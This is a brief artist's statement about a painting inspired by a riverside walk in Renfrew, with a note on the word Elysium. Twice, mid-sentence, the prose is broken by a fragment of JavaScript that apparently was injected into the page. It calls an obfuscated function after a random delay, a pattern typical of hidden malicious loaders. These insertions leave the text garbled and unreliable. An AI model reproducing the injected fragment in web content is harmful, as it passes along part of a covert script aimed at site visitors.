This painting was inspired by a walk with Tanja Kisslinger. We walked along the Bonnechere River in Renfrew. It was a beautiful day. Everything was perfect. Just a dream. Later that day – that night the energy of that time together flowed through me like a whisper. And I stayed up very late andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and painted this work.

Elysium – This word came into Latin from the Greek Elysion. In classical mythology, Elysium, or the Elysian fields, was the home of the blessed after death, the final resting place of the souls of the heroic andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and the pure. So it’s easy to see how the word came to mean any place or state of bliss or delight.
